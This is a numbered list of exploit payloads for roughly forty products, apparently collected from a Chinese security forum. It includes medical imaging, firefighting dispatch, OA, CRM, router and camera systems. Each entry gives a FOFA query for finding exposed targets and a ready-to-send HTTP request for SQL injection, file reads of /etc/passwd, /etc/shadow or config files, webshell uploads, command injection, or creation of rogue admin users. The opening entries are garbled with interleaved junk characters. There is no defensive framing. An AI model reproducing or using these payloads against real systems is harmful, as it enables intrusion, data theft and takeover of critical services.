0 d& I9 d2 u0 _5 K9 s
151. AJ-Report 1.4.1 pageList sql注入. \# z' }; L" {( ]
FOFA:title="AJ-Report"; ~* q* A) H" ]. }' E' E
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
8 e4 U! D0 O: Q! a$ T/ G2 ]/ b2 f& ^Host: x.x.x.x; M- x3 e' Q9 z# G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 ?$ X2 a/ y1 Z2 x" YConnection: close& ~2 w, b6 D. K9 h1 z
Accept-Encoding: gzip
: @" v! }! `* i  S# s8 I+ h, S$ V2 f4 A& e* x& S7 e
! I. e3 ?4 b" O8 u+ B/ J8 ?; B6 S  b
152. Progress Kemp LoadMaster 远程命令执行; G- M3 D0 e& j% g" U  W- z! D
CVE-2024-1212
' @; y( C4 M! \  @5 ^3 GLoadMaster <= 7.2.59.2 (GA)
: r9 O* N/ L0 m$ F6 `7 LLoadMaster<=7.2.54.8 (LTSF)8 ?8 V9 u+ l( M$ J! b1 T
LoadMaster <= 7.2.48.10 (LTS)  X0 G- c6 f' u7 }/ q3 I# k1 C6 c
FOFA:body="LoadMaster"  ^2 [! e# Z* S9 i$ ^
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
) i# k* {! I2 n, F) e# nGET /access/set?param=enableapi&value=1 HTTP/1.1& |: Q+ ]! {4 l2 G2 T- }/ U
Host: x.x.x.x, v! R1 A- ], K) `( @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
( T# w$ N$ ]- H+ C4 }* f+ a% C9 s6 E0 s' jConnection: close. E( K* S$ S/ D; F; }
Accept: */*8 i) X3 {' X5 o& }6 P
Accept-Language: en
) g/ K6 g. a8 w& W. [: WAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=' o1 P, W8 f' l' h: X2 ~9 y7 T; Q* u$ A
Accept-Encoding: gzip
! r8 N! E6 ?. A$ b8 J! u0 z- \( s1 y
# U; [( ^4 q, N. v) |2 D8 i6 B  w% R: I0 T
153. gradio任意文件读取, v5 N* `. e' E- y8 k) u; E* C
CVE-2024-1561FOFA:body="__gradio_mode__"
0 k' C" \9 i. i第一步,请求/config文件获取componets的id/ S/ g6 A4 S$ N
http://x.x.x.x/config
3 T7 a2 N, ~5 j. \# c- K. z5 E1 s* t6 q- r; j$ u8 q
7 @# F; ?  A) w! ^2 R. Y7 y7 ], {3 |( |
第二步,将/etc/passwd的内容写入到一个临时文件
" j- x8 y" M0 X3 V: gPOST /component_server HTTP/1.1; G2 ^$ H. c0 ]0 A4 I
Host: x.x.x.x6 w" r) v) ~4 b  |" q; `  L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
( R; @; \) |& l6 I2 Y% oConnection: close2 D( n6 w* U! m( T& _6 `
Content-Length: 115
5 k" P- O! ?5 e2 aContent-Type: application/json1 l/ k; a. @4 M) \% b
Accept-Encoding: gzip% Y, @3 m% h) s
" u5 `" \* K9 {. T. r8 p
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
  L2 Y$ ?+ A2 B( t( i! \
, V" B, g- ^9 |$ v3 [' V& M2 O1 m7 U  O& v* \
第三步访问. ^/ _1 u% @% J) U
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
+ Y" {$ q3 x6 `. F
' O* s7 w' G6 v$ k! J) G, G" ]( L/ C: E/ D) K
154. 天维尔消防救援作战调度平台 SQL注入1 D/ N1 H0 c4 m, I
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"" d# W7 u. ]+ z) B7 V
POST /twms-service-mfs/mfsNotice/page HTTP/1.18 m/ y) [" {1 B
Host: x.x.x.x& ?* Q& C2 Y+ V( j' N
Content-Length: 1062 U+ b' l, M" W" Q7 \* t, z* r" W
Cache-Control: max-age=06 k$ o- b. v, Z; _" o
Upgrade-Insecure-Requests: 1
% q1 \0 e# L# W% j: w) i! AOrigin: http://x.x.x.x
+ J; h5 t* ^8 b. \: K6 d2 i( ZContent-Type: application/json
# ~& j. Z, e, y* ~+ f/ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 C5 a2 \+ z  s# DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- A9 b6 F( y9 w7 M6 D/ H- {
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
4 t4 m8 O0 Y4 B4 KAccept-Encoding: gzip, deflate! _9 q( p5 i9 O2 v
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
$ g+ \! S, @( e( O+ ~Connection: close( v5 ^" ?, e5 X) F1 p$ x; i& C$ i- n
9 H5 x% K9 t8 T/ c* ^5 ?
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}' U7 Q% x; y7 s$ \5 @/ a
9 A4 u$ x" k6 Q  {% w, h
3 p+ F( L- w& u- R+ L* i4 J
155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file to verify: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx


165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 (LANWON clinical viewer) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
